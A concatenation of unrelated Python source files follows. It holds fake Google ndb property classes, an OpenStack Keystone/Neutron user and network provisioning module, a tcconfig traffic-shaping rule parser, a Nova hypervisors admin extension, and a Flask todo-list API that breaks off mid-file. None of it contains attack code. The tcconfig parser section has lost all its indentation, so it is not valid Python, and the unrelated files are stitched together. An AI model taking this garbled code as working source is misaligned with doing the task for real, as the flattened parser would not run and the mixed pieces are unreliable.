        return entity._faker.profile()
# --------------------------------------------------------------------
# Pickle Property
# --------------------------------------------------------------------
class PickleProperty(FakeProperty, ndb.PickleProperty):
    """Pickle property; falls back to a fake profile dict."""
    def _get_fallback_value(self, entity):
        return entity._faker.profile()
# --------------------------------------------------------------------
# Computed Property
# --------------------------------------------------------------------
class ComputedProperty(ndb.ComputedProperty):
    """Re-exported unchanged; computed values are never faked."""
    pass
# --------------------------------------------------------------------
# Structured Property
# --------------------------------------------------------------------
class StructuredProperty(ndb.StructuredProperty):
    """Re-exported unchanged; sub-model properties fake themselves."""
    pass
# --------------------------------------------------------------------
# Local Structured Property
# --------------------------------------------------------------------
class LocalStructuredProperty(ndb.LocalStructuredProperty):
    """Re-exported unchanged; sub-model properties fake themselves."""
    pass
# --------------------------------------------------------------------
# Blob Property
# --------------------------------------------------------------------
class BlobProperty(ndb.BlobProperty):
    """Unsupported: fake blob generation is not implemented."""
    def __init__(self, **kwargs):
        # Fail fast. The super().__init__ call that previously followed this
        # raise was unreachable dead code and has been removed.
        raise NotImplementedError()
# --------------------------------------------------------------------
# Blob Key Property
# --------------------------------------------------------------------
class BlobKeyProperty(ndb.BlobKeyProperty):
    """Unsupported: fake blob-key generation is not implemented."""
    def __init__(self, **kwargs):
        # Fail fast. The super().__init__ call that previously followed this
        # raise was unreachable dead code and has been removed.
        raise NotImplementedError()
| |
import settings
import uuid
import keystoneclient
from keystoneclient.v3 import client
from datetime import datetime
from neutronclient.v2_0 import client as neutron_client
import logging as log
from flask import current_app
import time
# The v2 public endpoint is derived from the configured v3 endpoint by
# rewriting the version suffix; neutron auth below still uses v2.0.
KEYSTONE_PUBLIC_V2_ENDPOINT = settings.KEYSTONE_PUBLIC_ENDPOINT
KEYSTONE_PUBLIC_V2_ENDPOINT = KEYSTONE_PUBLIC_V2_ENDPOINT.replace('/v3','/v2.0')
def write_log(data):
    """Append `data` to the ad-hoc debug log at /tmp/custom.log.

    Uses a context manager so the file handle is closed even when the
    write raises (the original leaked the handle on failure).
    """
    with open("/tmp/custom.log", "a") as f:
        f.write(data)
def get_client():
    """Return a keystone v3 client using the configured admin token/endpoint."""
    keystone = client.Client(token=settings.KEYSTONE_ADMIN_TOKEN,
        endpoint=settings.KEYSTONE_ADMIN_ENDPOINT)
    return keystone
def get_neutron_client(uname, pwd, tenantname):
    """Build a neutron client authenticated against the v2 public endpoint.

    Returns None when client construction fails (the failure is logged).
    Previously the local variable was never assigned on failure, so the
    final `return neutron` raised NameError instead of reporting the error.
    """
    neutron = None
    try:
        neutron = neutron_client.Client(username=uname, password=pwd,
                                        auth_url=KEYSTONE_PUBLIC_V2_ENDPOINT,
                                        tenant_name=tenantname)
        neutron.format = 'json'
    except Exception as e:
        current_app.logger.exception("Exception in neutron client")
        current_app.logger.exception(e)
    #neutron = neutron_client.Client(token=settings.KEYSTONE_ADMIN_TOKEN,auth_url=settings.KEYSTONE_PUBLIC_V2_ENDPOINT,tenant_name=tenantname)
    return neutron
def _create_user(name, domain=None, project=None, password=None,
                 email=None, description=None, enabled=None,
                 default_project=None, keystone=None,
                 **kwargs):
    """Create a keystone user.

    NOTE(review): the `domain`, `project`, `description` and
    `default_project` arguments are accepted but NOT forwarded -- the call
    below hard-codes None for them. The "##SM:" comments in create_user()
    suggest this may be a deliberate workaround; confirm before changing.
    """
    if not keystone:
        keystone = get_client()
    user = keystone.users.create(name, domain=None, project=None, password=password,
        email=email, description=None, enabled=enabled, default_project=None,
        **kwargs)
    return user
def create_user(name, password, email=None, description=None, enabled=False, **kwargs):
    """Create a user plus a dedicated project, role grant and network.

    On any failure the role grant, user, project and network created so far
    are rolled back and the original exception is re-raised.
    Raises Conflict when a user with `name` already exists.
    """
    project = None
    user = None
    network = None
    role_granted = False
    neutron = None
    keystone = get_client()
    _user = get_user_by_name(name)
    if _user:
        raise keystoneclient.apiclient.exceptions.Conflict("User already exist")
    try:
        domain = get_default_domain(keystone)
        # Tenant names are made unique with a timestamp suffix.
        tenant_name = name + '-' + datetime.now().strftime('%Y%m%d%H%M%S')
        project = create_project(domain, tenant_name , keystone)
        role = get_default_role(keystone)
        ##SM:domain is optional
        user = _create_user(name, domain=domain, project=project, password=password,
            email=email, enabled=enabled, keystone=keystone, **kwargs)
        ##SM:Specify either a domain or project, not both
        keystone.roles.grant(role, user=user, domain=None, project=project)
        role_granted = True
        user = keystone.users.update(user=user.id,enabled=True)
        # NOTE(review): fixed sleep -- presumably waiting for the enable to
        # propagate before authenticating as the new user; confirm.
        time.sleep(5)
        try:
            neutron = get_neutron_client(name,password,tenant_name)
        except Exception as e:
            log.exception("Exception while initializing neutron client")
            current_app.logger.exception(e)
        try:
            if neutron:
                network = create_network(neutron,domain.name)
        except Exception as e:
            current_app.logger.exception(e)
            log.exception("Exception while creating network %s"%(str(e)))
            # Network creation failed: disable the user again.
            user = keystone.users.update(user=user.id,enabled=False)
    except Exception as ex:
        # Roll back everything created so far before re-raising.
        if role_granted:
            keystone.roles.revoke(role, user=user, domain=None, project=project)
        if user:
            delete_user(user)
        if project:
            delete_project(project)
        if network:
            delete_network(neutron,network)
        raise ex
    return user
def delete_user(id, keystone=None):
    """Delete the keystone user with the given id."""
    (keystone or get_client()).users.delete(id)
def create_project(domain, name=None, keystone=None):
    """Create a keystone project in `domain`, generating a name if needed."""
    if not name:
        name = get_unique_project_name()
    client_ = keystone or get_client()
    return client_.projects.create(name, domain)
def create_network(neutron,network_name):
    """Create a network plus a default 192.168.0.0/24 subnet (and ipam).

    Returns the created network dict, or None when any step fails --
    errors are logged and swallowed.
    """
    try:
        body_sample = {'network': {'name': network_name, 'admin_state_up': True}}
        network = neutron.create_network(body=body_sample)
        neutron.create_subnet( { 'subnet' : { 'network_id' : network["network"]["id"], 'ip_version' : 4, 'cidr' : '192.168.0.0/24' } } )
        ipam_body = {'ipam':{'name': "Default"}}
        # Dev machines may not have contrail installed, which provides create_ipam.
        if "create_ipam" in dir(neutron):
            neutron.create_ipam(body=ipam_body)
        return network
    except Exception as e:
        current_app.logger.exception(e)
        current_app.logger.exception("Exception was raised while creating neutron network")
def delete_project(id, keystone=None):
    """Delete the keystone project with the given id."""
    (keystone or get_client()).projects.delete(id)
def delete_network(neutron,network):
    """Best-effort delete of a neutron network; errors are logged and swallowed."""
    try:
        neutron.delete_network(network["network"]["id"])
    except Exception as e:
        current_app.logger.exception("Exception while deleting network")
        current_app.logger.exception(e)
def get_unique_project_name():
    """Generate a prefixed random project name not already in keystone."""
    while True:
        candidate = settings.PROJECT_NAME_PREFIX + uuid.uuid4().hex
        if not get_project_by_name(name=candidate):
            return candidate
def get_user_by_name(name, keystone=None):
    """Return the first keystone user matching `name`, or None."""
    client_ = keystone or get_client()
    matches = client_.users.list(name=name)
    return matches[0] if matches else None
def get_user(id, keystone=None):
    """Fetch a keystone user by id."""
    client_ = keystone or get_client()
    return client_.users.get(id)
def get_project_by_name(name=None, project_id=None, keystone=None):
    """Return the first project matching `name`, or None.

    `project_id` is accepted for interface compatibility but is not used.
    """
    client_ = keystone or get_client()
    matches = client_.projects.list(name=name)
    return matches[0] if matches else None
def get_default_role(keystone=None):
    """Return the role named settings.DEFAULT_ROLE_NAME, or raise."""
    client_ = keystone or get_client()
    matches = client_.roles.list(name=settings.DEFAULT_ROLE_NAME)
    if not matches:
        raise Exception("Could not find the default role:%s"%(settings.DEFAULT_ROLE_NAME))
    return matches[0]
def get_default_domain(keystone=None):
    """Return the domain named settings.DEFAULT_DOMAIN_NAME, or raise."""
    client_ = keystone or get_client()
    matches = [x for x in client_.domains.list() if x.name in [settings.DEFAULT_DOMAIN_NAME]]
    if not matches:
        raise Exception("Could not find the default domain:%s"%(settings.DEFAULT_DOMAIN_NAME))
    return matches[0]
def enable_user(user_id, keystone=None):
    """Enable a user and clear its SMS activation state.

    NOTE(review): sms_activation_code/sms_activation_code_time look like
    deployment-specific extension attributes; confirm keystone accepts them.
    """
    if not keystone:
        keystone = get_client()
    user = keystone.users.update(user=user_id, enabled=True,
        sms_activation_code=None, sms_activation_code_time=None)
    return user
def update_user(user, **data):
    """Update arbitrary attributes of a keystone user via the v3 API."""
    manager = get_client().users
    return manager.update(user, **data)
| |
"""
.. codeauthor:: Tsuyoshi Hombashi <tsuyoshi.hombashi@gmail.com>
"""
import copy
from collections import OrderedDict
import subprocrunner
import typepy
from simplesqlite import SimpleSQLite, TableNotFoundError, connect_memdb
from simplesqlite.query import And, Where
from .._common import is_execute_tc_command
from .._const import Tc, TcSubCommand, TrafficDirection
from .._error import NetworkInterfaceNotFoundError
from .._iptables import IptablesMangleController
from .._network import is_anywhere_network
from .._tc_command_helper import get_tc_base_command, run_tc_show
from ._class import TcClassParser
from ._filter import TcFilterParser
from ._model import Filter, Qdisc
from ._qdisc import TcQdiscParser
class TcShapingRuleParser:
@property
def con(self):
    # SQLite connection (in-memory unless dump_db_path was given).
    return self.__con
@property
def device(self):
    # Primary network interface whose rules are parsed.
    return self.__device
@property
def ifb_device(self):
    # Paired ifb device holding incoming-direction rules, or None.
    return self.__ifb_device
def __init__(
    self,
    device,
    ip_version,
    logger,
    tc_command_output,
    export_path=None,
    is_parse_filter_id=True,
    dump_db_path=None,
):
    """Set up DB models, resolve the paired ifb device and iptables ctrl.

    Args:
        device: network interface name whose tc rules are parsed.
        ip_version: IP version forwarded to the filter parser/iptables.
        logger: logger used for diagnostics.
        tc_command_output: controls whether tc commands actually execute.
        export_path: optional path used when exporting parameters.
        is_parse_filter_id: whether filter ids are parsed.
        dump_db_path: when given, results go to this SQLite file instead
            of an in-memory database.
    """
    if dump_db_path is None:
        self.__con = connect_memdb()
    else:
        self.__con = SimpleSQLite(dump_db_path, "w")
    Filter.attach(self.__con)
    Filter.create()
    Qdisc.attach(self.__con)
    Qdisc.create()
    self.__device = device
    self.__ip_version = ip_version
    self.__tc_command_output = tc_command_output
    self.__logger = logger
    self.__export_path = export_path
    self.clear()
    # Incoming-direction rules live on the paired ifb device, if any.
    self.__ifb_device = self.__get_ifb_from_device()
    self.__iptables_ctrl = IptablesMangleController(True, ip_version)
    self.is_parse_filter_id = is_parse_filter_id
def clear(self):
    """Reset parser state: fresh filter parser and per-device parsed flags."""
    self.__filter_parser = TcFilterParser(self.__con, self.__ip_version)
    self.__parsed_mappings = {}
def extract_export_parameters(self):
    """Return (outgoing_rules, incoming_rules), each tagged with device/direction."""
    _, out_rules = self.__get_shaping_rule(self.device)
    _, in_rules = self.__get_shaping_rule(self.ifb_device)
    for out_rule in out_rules:
        out_rule.update(
            {Tc.Param.DEVICE: self.device, Tc.Param.DIRECTION: TrafficDirection.OUTGOING}
        )
    for in_rule in in_rules:
        # Incoming rules are attributed to the ifb device.
        in_rule.update(
            {Tc.Param.DEVICE: self.ifb_device, Tc.Param.DIRECTION: TrafficDirection.INCOMING}
        )
    return (out_rules, in_rules)
def get_tc_parameter(self):
out_rule_maps, _ = self.__get_shaping_rule(self.device)
in_rule_maps, _ = self.__get_shaping_rule(self.ifb_device)
return {
self.device: {
TrafficDirection.OUTGOING: out_rule_maps,
TrafficDirection.INCOMING: in_rule_maps,
}
}
def parse(self):
self.__parse_device(self.device)
self.__parse_device(self.ifb_device)
def __parse_device(self, device):
if not device:
return
if self.__parsed_mappings.get(device):
return
self.__parse_tc_class(device)
self.__parse_tc_filter(device)
self.__parse_tc_qdisc(device)
self.__parsed_mappings[device] = True
def __get_ifb_from_device(self):
if not is_execute_tc_command(self.__tc_command_output):
return None
filter_runner = subprocrunner.SubprocessRunner(
"{:s} show dev {:s} root".format(get_tc_base_command(TcSubCommand.FILTER), self.device),
error_log_level="QUIET",
dry_run=False,
)
if filter_runner.run() != 0 and filter_runner.stderr.find("Cannot find device") != -1:
raise NetworkInterfaceNotFoundError(target=self.device)
return self.__filter_parser.parse_incoming_device(filter_runner.stdout)
def __get_filter_key(self, filter_param):
key_items = OrderedDict()
if Tc.Param.HANDLE in filter_param:
handle = filter_param.get(Tc.Param.HANDLE)
typepy.Integer(handle).validate()
handle = int(handle)
for mangle in self.__iptables_ctrl.parse():
if mangle.mark_id != handle:
continue
key_items[Tc.Param.DST_NETWORK] = mangle.destination
if typepy.is_not_null_string(mangle.source):
key_items[Tc.Param.SRC_NETWORK] = mangle.source
key_items[Tc.Param.PROTOCOL] = mangle.protocol
break
else:
raise ValueError("mangle mark not found: {}".format(mangle))
else:
src_network = filter_param.get(Tc.Param.SRC_NETWORK)
if typepy.is_not_null_string(src_network) and not is_anywhere_network(
src_network, self.__ip_version
):
key_items[Tc.Param.SRC_NETWORK] = src_network
dst_network = filter_param.get(Tc.Param.DST_NETWORK)
if typepy.is_not_null_string(dst_network) and not is_anywhere_network(
dst_network, self.__ip_version
):
key_items[Tc.Param.DST_NETWORK] = dst_network
src_port = filter_param.get(Tc.Param.SRC_PORT)
if typepy.Integer(src_port).is_type():
key_items[Tc.Param.SRC_PORT] = "{}".format(src_port)
elif src_port is not None:
self.__logger.warning(
"expected a integer value for {}, actual {}: {}".format(
Tc.Param.SRC_PORT, type(src_port), src_port
)
)
dst_port = filter_param.get(Tc.Param.DST_PORT)
if typepy.Integer(dst_port).is_type():
key_items[Tc.Param.DST_PORT] = "{}".format(dst_port)
elif src_port is not None:
self.__logger.warning(
"expected a integer value for {}, actual {}".format(
Tc.Param.DST_PORT, type(dst_port)
)
)
protocol = filter_param.get(Tc.Param.PROTOCOL)
if typepy.is_not_null_string(protocol):
key_items[Tc.Param.PROTOCOL] = protocol
key = ", ".join(["{}={}".format(key, value) for key, value in key_items.items()])
return key, key_items
def __get_shaping_rule(self, device):
if typepy.is_null_string(device):
return ({}, [])
self.__parse_device(device)
where_dev_query = Where(Tc.Param.DEVICE, device)
try:
class_params = self.__con.select_as_dict(
table_name=TcSubCommand.CLASS.value, where=where_dev_query
)
except TableNotFoundError:
class_params = []
try:
filter_params = Filter.select(where=where_dev_query)
except TableNotFoundError:
filter_params = []
shaping_rule_mapping = {}
shaping_rules = []
for filter_param in filter_params:
filter_param = filter_param.as_dict()
self.__logger.debug("{:s} param: {}".format(TcSubCommand.FILTER, filter_param))
shaping_rule = {}
filter_key, rule_with_keys = self.__get_filter_key(filter_param)
if typepy.is_null_string(filter_key):
self.__logger.debug("empty filter key: {}".format(filter_param))
continue
qdisc_id = filter_param.get(Tc.Param.FLOW_ID)
if qdisc_id is None:
qdisc_id = filter_param.get(Tc.Param.CLASS_ID)
try:
qdisc_params = Qdisc.select(
where=And([where_dev_query, Where(Tc.Param.PARENT, qdisc_id)])
)
except TableNotFoundError:
qdisc_params = []
for qdisc_param in qdisc_params:
qdisc_param = qdisc_param.as_dict()
self.__logger.debug("{:s} param: {}".format(TcSubCommand.QDISC, qdisc_param))
if self.is_parse_filter_id:
shaping_rule[Tc.Param.FILTER_ID] = filter_param.get(Tc.Param.FILTER_ID)
# shaping_rule[Tc.Param.PRIORITY] = filter_param.get(
# Tc.Param.PRIORITY)
shaping_rule.update(
self.__strip_param(
qdisc_param,
[Tc.Param.DEVICE, Tc.Param.PARENT, Tc.Param.HANDLE, "direct_qlen"],
)
)
for class_param in class_params:
self.__logger.debug("{:s} param: {}".format(TcSubCommand.CLASS, class_param))
if class_param.get(Tc.Param.CLASS_ID) not in (
filter_param.get(Tc.Param.FLOW_ID),
filter_param.get(Tc.Param.CLASS_ID),
):
continue
if self.is_parse_filter_id:
shaping_rule[Tc.Param.FILTER_ID] = filter_param.get(Tc.Param.FILTER_ID)
# shaping_rule[Tc.Param.PRIORITY] = filter_param.get(
# Tc.Param.PRIORITY)
shaping_rule.update(
self.__strip_param(class_param, [Tc.Param.DEVICE, Tc.Param.CLASS_ID])
)
if not shaping_rule:
self.__logger.debug("shaping rule not found for '{}'".format(filter_param))
continue
self.__logger.debug("shaping rule found: {} {}".format(filter_key, shaping_rule))
rule_with_keys.update(shaping_rule)
shaping_rules.append(rule_with_keys)
shaping_rule_mapping[filter_key] = shaping_rule
return (shaping_rule_mapping, shaping_rules)
def __parse_tc_qdisc(self, device):
TcQdiscParser(self.__con).parse(
device, run_tc_show(TcSubCommand.QDISC, device, self.__tc_command_output)
)
def __parse_tc_filter(self, device):
self.__filter_parser.parse(
device, run_tc_show(TcSubCommand.FILTER, device, self.__tc_command_output)
)
def __parse_tc_class(self, device):
TcClassParser(self.__con).parse(
device, run_tc_show(TcSubCommand.CLASS, device, self.__tc_command_output)
)
@staticmethod
def __strip_param(params, strip_params):
work_params = copy.deepcopy(params)
for strip_param in strip_params:
try:
del work_params[strip_param]
except KeyError:
pass
return {key: value for key, value in work_params.items() if value is not None}
| |
# Copyright (c) 2012 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""The hypervisors admin extension."""
import webob.exc
from nova.api.openstack import extensions
from nova.api.openstack import wsgi
from nova.api.openstack import xmlutil
from nova import compute
from nova import exception
from nova.openstack.common.gettextutils import _
# Policy-check helper for the admin-only "hypervisors" extension.
authorize = extensions.extension_authorizer('compute', 'hypervisors')
def make_hypervisor(elem, detail):
    """Attach hypervisor attributes to an XML template element.

    With ``detail`` set, resource-usage fields and the owning service
    sub-element are included as well.
    """
    elem.set('hypervisor_hostname')
    elem.set('id')
    if detail:
        for attr_name in ('vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
                          'memory_mb_used', 'local_gb_used',
                          'hypervisor_type', 'hypervisor_version',
                          'free_ram_mb', 'free_disk_gb', 'current_workload',
                          'running_vms', 'cpu_info',
                          'disk_available_least'):
            elem.set(attr_name)
        service = xmlutil.SubTemplateElement(elem, 'service',
                                             selector='service')
        service.set('id')
        service.set('host')
class HypervisorIndexTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for the hypervisor index (summary) view."""

    def construct(self):
        root = xmlutil.TemplateElement('hypervisors')
        hyp_elem = xmlutil.SubTemplateElement(root, 'hypervisor',
                                              selector='hypervisors')
        make_hypervisor(hyp_elem, False)
        return xmlutil.MasterTemplate(root, 1)
class HypervisorDetailTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for the hypervisor detail view."""

    def construct(self):
        root = xmlutil.TemplateElement('hypervisors')
        hyp_elem = xmlutil.SubTemplateElement(root, 'hypervisor',
                                              selector='hypervisors')
        make_hypervisor(hyp_elem, True)
        return xmlutil.MasterTemplate(root, 1)
class HypervisorTemplate(xmlutil.TemplateBuilder):
    """XML serialization template for a single hypervisor (detail view)."""

    def construct(self):
        hyp_root = xmlutil.TemplateElement('hypervisor', selector='hypervisor')
        make_hypervisor(hyp_root, True)
        return xmlutil.MasterTemplate(hyp_root, 1)
class HypervisorUptimeTemplate(xmlutil.TemplateBuilder):
    """XML template for a hypervisor summary plus its uptime attribute."""

    def construct(self):
        hyp_root = xmlutil.TemplateElement('hypervisor', selector='hypervisor')
        make_hypervisor(hyp_root, False)
        hyp_root.set('uptime')
        return xmlutil.MasterTemplate(hyp_root, 1)
class HypervisorServersTemplate(xmlutil.TemplateBuilder):
    """XML template for hypervisors together with their server lists."""

    def construct(self):
        root = xmlutil.TemplateElement('hypervisors')
        hyp_elem = xmlutil.SubTemplateElement(root, 'hypervisor',
                                              selector='hypervisors')
        make_hypervisor(hyp_elem, False)
        servers_elem = xmlutil.SubTemplateElement(hyp_elem, 'servers')
        server_elem = xmlutil.SubTemplateElement(servers_elem, 'server',
                                                 selector='servers')
        server_elem.set('name')
        server_elem.set('uuid')
        return xmlutil.MasterTemplate(root, 1)
class HypervisorStatisticsTemplate(xmlutil.TemplateBuilder):
    """XML template for the aggregate hypervisor statistics view."""

    def construct(self):
        stats_root = xmlutil.TemplateElement('hypervisor_statistics',
                                             selector='hypervisor_statistics')
        for stat_attr in ('count', 'vcpus', 'memory_mb', 'local_gb',
                          'vcpus_used', 'memory_mb_used', 'local_gb_used',
                          'free_ram_mb', 'free_disk_gb', 'current_workload',
                          'running_vms', 'disk_available_least'):
            stats_root.set(stat_attr)
        return xmlutil.MasterTemplate(stats_root, 1)
class HypervisorsController(object):
    """The Hypervisors API controller for the OpenStack API."""
    def __init__(self):
        self.host_api = compute.HostAPI()
        super(HypervisorsController, self).__init__()
    def _view_hypervisor(self, hypervisor, detail, servers=None, **kwargs):
        """Build the dict representation of a compute node.

        :param hypervisor: compute node record (mapping-like)
        :param detail: include resource-usage fields and service info
        :param servers: optional instance records listed under 'servers'
        :param kwargs: extra key/value pairs merged into the result
        """
        hyp_dict = {
            'id': hypervisor['id'],
            'hypervisor_hostname': hypervisor['hypervisor_hostname'],
        }
        # Detail fields are only added when no server list was supplied.
        if detail and not servers:
            for field in ('vcpus', 'memory_mb', 'local_gb', 'vcpus_used',
                          'memory_mb_used', 'local_gb_used',
                          'hypervisor_type', 'hypervisor_version',
                          'free_ram_mb', 'free_disk_gb', 'current_workload',
                          'running_vms', 'cpu_info', 'disk_available_least'):
                hyp_dict[field] = hypervisor[field]
            hyp_dict['service'] = {
                'id': hypervisor['service_id'],
                'host': hypervisor['service']['host'],
            }
        if servers:
            hyp_dict['servers'] = [dict(name=serv['name'], uuid=serv['uuid'])
                                   for serv in servers]
        # Add any additional info
        if kwargs:
            hyp_dict.update(kwargs)
        return hyp_dict
    @wsgi.serializers(xml=HypervisorIndexTemplate)
    def index(self, req):
        """List all compute nodes (summary view)."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_get_all(context)
        return dict(hypervisors=[self._view_hypervisor(hyp, False)
                                 for hyp in compute_nodes])
    @wsgi.serializers(xml=HypervisorDetailTemplate)
    def detail(self, req):
        """List all compute nodes (detail view)."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_get_all(context)
        return dict(hypervisors=[self._view_hypervisor(hyp, True)
                                 for hyp in compute_nodes])
    @wsgi.serializers(xml=HypervisorTemplate)
    def show(self, req, id):
        """Show a single compute node; 404 when the id is unknown."""
        context = req.environ['nova.context']
        authorize(context)
        try:
            hyp = self.host_api.compute_node_get(context, id)
        except (ValueError, exception.ComputeHostNotFound):
            msg = _("Hypervisor with ID '%s' could not be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
        return dict(hypervisor=self._view_hypervisor(hyp, True))
    @wsgi.serializers(xml=HypervisorUptimeTemplate)
    def uptime(self, req, id):
        """Show a compute node's summary view plus its host uptime.

        Responds 404 for an unknown id, 501 when the virt driver does
        not implement uptime.
        """
        context = req.environ['nova.context']
        authorize(context)
        try:
            hyp = self.host_api.compute_node_get(context, id)
        except (ValueError, exception.ComputeHostNotFound):
            msg = _("Hypervisor with ID '%s' could not be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
        # Get the uptime
        try:
            host = hyp['service']['host']
            uptime = self.host_api.get_host_uptime(context, host)
        except NotImplementedError:
            msg = _("Virt driver does not implement uptime function.")
            raise webob.exc.HTTPNotImplemented(explanation=msg)
        return dict(hypervisor=self._view_hypervisor(hyp, False,
                                                     uptime=uptime))
    @wsgi.serializers(xml=HypervisorIndexTemplate)
    def search(self, req, id):
        """List compute nodes whose hypervisor hostname matches ``id``."""
        context = req.environ['nova.context']
        authorize(context)
        hypervisors = self.host_api.compute_node_search_by_hypervisor(
            context, id)
        if hypervisors:
            return dict(hypervisors=[self._view_hypervisor(hyp, False)
                                     for hyp in hypervisors])
        else:
            msg = _("No hypervisor matching '%s' could be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
    @wsgi.serializers(xml=HypervisorServersTemplate)
    def servers(self, req, id):
        """List matching compute nodes with the instances hosted on each."""
        context = req.environ['nova.context']
        authorize(context)
        compute_nodes = self.host_api.compute_node_search_by_hypervisor(
            context, id)
        if not compute_nodes:
            msg = _("No hypervisor matching '%s' could be found.") % id
            raise webob.exc.HTTPNotFound(explanation=msg)
        hypervisors = []
        for compute_node in compute_nodes:
            instances = self.host_api.instance_get_all_by_host(context,
                compute_node['service']['host'])
            hyp = self._view_hypervisor(compute_node, False, instances)
            hypervisors.append(hyp)
        return dict(hypervisors=hypervisors)
    @wsgi.serializers(xml=HypervisorStatisticsTemplate)
    def statistics(self, req):
        """Return aggregate statistics over all compute nodes."""
        context = req.environ['nova.context']
        authorize(context)
        stats = self.host_api.compute_node_statistics(context)
        return dict(hypervisor_statistics=stats)
class Hypervisors(extensions.ExtensionDescriptor):
    """Admin-only hypervisor administration."""
    name = "Hypervisors"
    alias = "os-hypervisors"
    namespace = "http://docs.openstack.org/compute/ext/hypervisors/api/v1.1"
    updated = "2012-06-21T00:00:00+00:00"
    def get_resources(self):
        """Register the os-hypervisors resource with its extra actions."""
        resource = extensions.ResourceExtension(
            'os-hypervisors',
            HypervisorsController(),
            collection_actions={'detail': 'GET',
                                'statistics': 'GET'},
            member_actions={'uptime': 'GET',
                            'search': 'GET',
                            'servers': 'GET'})
        return [resource]
| |
# -*- coding: utf-8 -*-
from flask import jsonify, request, abort, url_for
from datetime import datetime
from . import api
from ..models import User, Todo, TodoList
from ..decorators import admin_required
@api.route('/')
def get_routes():
    """Return the API entry points (user and todolist collections)."""
    return jsonify({
        'users': url_for('api.get_users', _external=True),
        'todolists': url_for('api.get_todolists', _external=True),
    })
@api.route('/users/')
def get_users():
    """List all users."""
    payload = []
    for user in User.query.all():
        payload.append({'user': user.to_json()})
    return jsonify({'users': payload})
@api.route('/user/<username>/')
def get_user(username):
    """Return a single user looked up by username; 404 when unknown."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        abort(404)
    return jsonify({'user': user.to_json()})
@api.route('/user/', methods=['POST'])
def add_user():
    """Create a user from a JSON payload with username/email/password.

    Responds 400 on missing or invalid data; 201 with the new user on
    success.
    """
    try:
        username = request.json.get('username')
        email = request.json.get('email')
        password = request.json.get('password')
        if User.is_valid_username(username) and User.is_valid_email(email) \
                and User.is_valid_password(password):
            user = User(
                username=username, email=email, password=password
            ).save()
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:`` so SystemExit and
    # KeyboardInterrupt are no longer swallowed; any request/model error
    # still maps to a 400 response.
    except Exception:
        abort(400)
    return jsonify({'user': user.to_json()}), 201
@api.route('/user/<username>/todolists/')
def get_user_todolists(username):
    """List all todolists created by the given user; 404 when unknown."""
    user = User.query.filter_by(username=username).first()
    if user is None:
        abort(404)
    return jsonify({
        'todolists': [todolist.to_json() for todolist in user.todolists]
    })
@api.route('/user/<username>/todolist/<int:todolist_id>/')
def get_user_todolist(username, todolist_id):
    """Return one todolist, verifying it belongs to the given user."""
    user = User.query.filter_by(username=username).first()
    todolist = TodoList.query.get_or_404(todolist_id)
    if not user or todolist.creator != username:
        abort(404)
    return jsonify({'todolist': todolist.to_json()})
@api.route('/user/<username>/todolist/', methods=['POST'])
def add_user_todolist(username):
    """Create a todolist owned by ``username``; 400 on any failure."""
    try:
        # .one() raises when the user does not exist -> mapped to 400.
        user = User.query.filter_by(username=username).one()
        todolist = TodoList(
            title=request.json.get('title'),
            creator=user.username
        ).save()
    # BUGFIX: narrowed from a bare ``except:`` (no longer traps
    # SystemExit/KeyboardInterrupt).
    except Exception:
        abort(400)
    return jsonify({'todolist': todolist.to_json()}), 201
@api.route('/todolists/')
def get_todolists():
    """List every todolist."""
    all_lists = TodoList.query.all()
    return jsonify({'todolists': [tl.to_json() for tl in all_lists]})
@api.route('/todolist/<int:todolist_id>/')
def get_todolist(todolist_id):
    """Return one todolist by id; 404 when unknown."""
    return jsonify({'todolist': TodoList.query.get_or_404(todolist_id).to_json()})
@api.route('/todolist/', methods=['POST'])
def add_todolist():
    """Create a todolist from a JSON ``title``; 400 on invalid input."""
    try:
        title = request.json.get('title')
        if title and TodoList.is_valid_title(title):
            todolist = TodoList(title=title).save()
        else:
            abort(400)
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
    return jsonify({'todolist': todolist.to_json()}), 201
@api.route('/todolist/<int:todolist_id>/todos/')
def get_todolist_todos(todolist_id):
    """List the todos of one todolist; 404 when the list is unknown."""
    todolist = TodoList.query.get_or_404(todolist_id)
    todo_payloads = [todo.to_json() for todo in todolist.todos]
    return jsonify({'todos': todo_payloads})
@api.route('/user/<username>/todolist/<int:todolist_id>/todos/')
def get_user_todolist_todos(username, todolist_id):
    """List the todos of a todolist owned by ``username``; else 404."""
    todolist = TodoList.query.get_or_404(todolist_id)
    if username != todolist.creator:
        abort(404)
    todo_payloads = [todo.to_json() for todo in todolist.todos]
    return jsonify({'todos': todo_payloads})
@api.route('/user/<username>/todolist/<int:todolist_id>/', methods=['POST'])
def add_user_todolist_todo(username, todolist_id):
    """Add a todo, credited to ``username``, to the given todolist."""
    try:
        user = User.query.filter_by(username=username).one()
        # this way we check the existence of the todolist
        todolist = TodoList.query.get(todolist_id)
        todo = Todo(
            description=request.json.get('description'),
            todolist_id=todolist.id,
            creator=username
        ).save()
    # BUGFIX: narrowed from a bare ``except:``; a missing user/list or a
    # bad payload still answers 400.
    except Exception:
        abort(400)
    return jsonify({'todo': todo.to_json()}), 201
@api.route('/todolist/<int:todolist_id>/', methods=['POST'])
def add_todolist_todo(todolist_id):
    """Add an anonymous todo to the given todolist; 400 on failure."""
    try:
        # get() returns None for an unknown id; the attribute access below
        # then raises and is mapped to 400.
        todolist = TodoList.query.get(todolist_id)
        todo = Todo(
            description=request.json.get('description'),
            todolist_id=todolist.id
        ).save()
    # BUGFIX: narrowed from a bare ``except:``.
    except Exception:
        abort(400)
    return jsonify({'todo': todo.to_json()}), 201
@api.route('/todo/<int:todo_id>/')
